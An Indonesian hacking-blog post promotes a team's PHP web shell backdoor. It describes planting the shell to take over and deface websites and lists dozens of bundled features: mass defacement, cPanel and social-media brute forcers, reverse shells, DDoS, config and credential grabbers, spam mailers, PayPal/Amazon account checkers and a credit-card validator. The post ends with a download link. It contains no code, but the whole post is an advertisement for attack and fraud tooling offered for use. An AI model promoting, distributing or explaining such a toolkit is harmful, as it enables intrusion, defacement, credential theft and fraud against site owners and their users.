hello guys :) kali ini gua bakal ngerilis shell backdoor dari team kita, Sekedar info penting shell ini dibuat oleh FirewalL21, dan dibantu oleh teman lainya :v

shell ini dibuat atas permintaan anak anak act dan yang lainya. karna ActShellV.1 kurang lengkap toolsnya.
Seblumnya udah tau kan apa itu Shell Backdoor?   itu lho yang ada crootnya.. Shell Backdoor intinya adalah sekumpulan script/tools untuk mengekseskusi sebuah perintah web shell atau shell backdoor ini biasanya digunakan para defacer untuk mengeksekusi web , home deface atau yang lainnya. Jika anda sudah berhasil menanam shell pada sebuah site maka anda dapat mengambil alih site mengubah index,page login dan lain.lain

dan ini tampilan setelah login :

BACA JUGA : Metode Hack Akun Whatsapp Dengan Metasploit

background Darknet :v wohh dah kaya heker belom gan :v
 dan ini fitur dari tabel shellnya :
- Home
- Upload
- Command
- Mass Deface 
- Config
- LiteSpeed Config
- Jumping
- Symlink
- Symlink V.2
- Adminer
- Fake Root
- ReverseIP
- Cgi Telnet
- SMTP Grabber
- Auto Edit User
- Auto Edit Title WordPress
- WordPress Auto Deface
- WordPress Auto Deface V.2
- Wp Auto Hijack
- Cpanel Crack
- Bypass CloudFlare (file_get_content)
- Bypass etc/passwd
- Bypass vHost
- Defacer.ID
- Zone-H
- DataBase Dump
- String Tools (decode encode)

- DD0S
- Tools (reverse shell)

- Domains Viewer
- Csrf Exploiter
- Hash Generate (untuk mengecek dia memakai tipe hash apa)

- Magento DB Info
- Inject Code
- NginDexer
- WHMCS Decoder
- HashID
- Drupal MassExploiter
- CMS Vulnerability Scanner
- Revslider MassExploiter
- elFinderMass
- Log Hunter
- Port Scaner
- KRDP Shell (hanya bisa digunakan di windows server)

- Back Connect
- Back Connect V.2
- Disable Functions
- Shell Checker
- Shell Finder
- Admin finder
- Zip Menu
- About
- LogOut 

Gimana lumayan banyak kan toolsnya .? ini belom seberapa dibagian bawah shell masih banyak tools lagi.

begini tampilanya :
1. Tools Creator (ini berisi macam macam shell backdoor lain. jadi kalo kalian ingin gunakan backdoor lain gaperlu upload lagi tinggal klick saja :v )

¬ Tools Creator :
- WSO 2.8.1
- 1n73ction
- Tmp shell
- Dhanush Shell
- R57 Shell
- Encode Decode
- Uploader
- b374k Shell
- Shell Merica
- Act Shell V.1
- Brudul Shell
- Mini Shell
- Shell IndoXploit V.3
- Shell Badcode
- Shell NONAME
- Terserah shell
- 1337 Cp Crack

2. Tools Spammer ( Ini buat lo yang suka spamming )

¬Tools Spammer :
- Pro Mailer V2
- Paypal Token Generator
- Mailer
- Mailer Mass send V.2
- Black Space Mailer
- priv 8 Tools
- Online credit card validator
- PayPal Valid Email Checker [ Fresh ] 
- [ $ ] AmazOn Valid Checker [ $ ]
- Paypal Email Valid checker
- Priv8 Smtp & Other Setup
- Hotmail inbox
- Mass Mailer by F4jzar-xCyb3r207
- Mass Mailler Inbox
- Email Filter
- AMAZON Email Checker
- EBay Email Checker
- Database Emails Extractor
- BukaLapak Account Checker
- Tokopedia Checker

3. Tools Exploiter  (Tools para defacer neh :v )

¬Tools Exploiter :

- Auto File Upload phpMyAdmin
- Magento CMS BruteForce Admin Login
- CSRF Xploiter Online
- WordPress U-Design Themes Uploadify Dorker
- ShellShock Xploiter (WebBased)
- ShellShock Auto Xploit & Reverse Shell
- Webdav Mass Xploiter IP
- POPOJI CMS Add Admin Auto Registration
- SQL Dork Scanner via Bing Dorker [ Web ]
- Prestashop Modules Blocktestimonial File Upload
- WebConsole
- Local Root Exploiter by Makman ( No BackConnect )
- Bin Checker
- Drupal core 7.x
- KrimOu CPanel Cracker Script & Root Server
- Mass Revslider Exl0it1ng
- Extract Emails From WordPress–Joomla–OpenCart–WHMCS
- Reverse Ip Lookup Domain
- Bypass SafeMode
- Symlink Based cPanel
- Config Wordpress and Joomla Grabber
- WP2
- auto create sudomain
- Mini Mass Auto Xploiter Only Tools v1.0
- ownLFI| t00lkit v1.0 | By Asesino04
- PHP Info
- m0bil3_xT's SQLi Scanner
- Exploits Wordpress LFD
- xSec-BackDoor Generator [ Create Your Own Backdoor ]
- Bypass [ LiteSpeed - Nginx - Apache ] By b0x
- Upload File Using file_get_contents
- Proxy By Root
- Read File Using 3 Function
- MySQL Query Command Execute
- Create Htaccess
- Simple Bypasser [ fopen + file_get_contents ]
- Search For Blind SQL Injection vBulltein By List
- Get all Site Server
- Scanner Sh3LL'z & Dir'z
- Bypass SuPHP Version 2 [ Sfa7 trick ]
- Extract Users From Passwd
- Bypass Method Not implemented
- Get Wordpress User
- Wordpress Killer
- 3mlaq Games Exploit
- Extract Emails From OpenCart CMS
- Search For Exploit Via Exploit-DB
- Extract [id-username-password-salt-email]
- Get Tools From Your AppServ
- Checking joomla 1.6 - 1.7 Registration
- Login Form With SESSION Without Connect To Database
- Generate XML Plugin vBulletin [ ajax.php ]
- RCI Joomla Exploit PHP Version
- Kleeja XML Plugin Generator
- Joomla Brute Force
- 4images Brute Force
- Brute Force All Wordpress On Server
- Skype Brute Force PHP Version
- Twitter Brute Force
- Ask.Fm Brute Force
- Dimofinf Brute Force
- grabber sqli sites from ip
- Protect Folder Via Htaccess
- Add Http:// to sites
- WordPress NativeChurch theme LFI scanner
- Kumpulan LocalRoot Exploiter
- All Bypasser

gimana bro lumayan lengkap kan toolsnya ? jadi tinggal croot aja  pakai shell ini :v

Link Download : KLIK DISINI

Oke Cukup Sekian Dan Terima Kasih


Jangan Lupa Untuk Terus Visit blog kami : https://mrwho-404.blogspot.com/?m=1

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